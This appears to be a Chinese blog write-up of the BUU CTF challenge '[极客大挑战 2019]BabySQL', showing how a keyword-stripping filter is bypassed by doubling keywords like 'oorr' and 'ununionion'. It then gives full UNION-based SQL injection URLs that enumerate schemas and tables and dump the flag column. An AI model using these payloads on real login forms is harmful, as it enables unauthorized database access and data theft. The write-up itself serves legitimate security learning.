BUU WEB [极客大挑战 2019]BabySQL

看题目,明显是一个SQL注入,打开网页,直接用万能密码登陆试试看:
在这里插入图片描述
不行,那就只能老老实实一步一步的走了,先order by:
在这里插入图片描述
错误!
这就很尬了,但我们可以从提示信息里发现一些有趣的东西,万能密码里的提示信息是or之后的信息,order by也是,而且是der…,那是不是可以推测,or是被检测到删除了?!回到万能密码再试一次,这次双写oorr:
在这里插入图片描述

成功登陆!
这说明我们的推测是正确的,那这里就是双写绕过了呗。
我们将提示错误的信息里被删除的关键词都双写,就可以正常的注入啦(在之后的注入里会发现from和where也被过滤了,另外注意,函数有些也包括这几个关键词,注意双写):

?username=1' oorrder bbyy 4%23&password=1

在这里插入图片描述
3个字段,即表中有三列数据,,然后联合查询暴库名:

?username=1' ununionion seselectlect 1,2,database() %23&password=1

在这里插入图片描述
然后表名:

?username=1' uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'%23&password=1

在这里插入图片描述
接下来就是字段名和数据了,但在这两个表里我都没找到flag。。。
经查阅资料(WP嘿嘿),发现找错库了!那就从头来,先爆出所有的库名:

?username=1' ununionion seselectlect 1,2,group_concat(schema_name)frfromom (infoorrmation_schema.schemata) %23&password=1

在这里插入图片描述
flag嘛,那自然在ctf库里了(当然不一定,但大概率在):
(省略了order by直接查看了表名)

?username=1' uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'  %23&password=1

在这里插入图片描述
flag!
查字段:


?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere  table_name="Flag"%23&password=1

在这里插入图片描述
,查看数据:

?username=1' uniunionon selselectect 1,2,flag frfromom ctf.Flag%23&password=1
或
?username=1' ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23&password=1

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值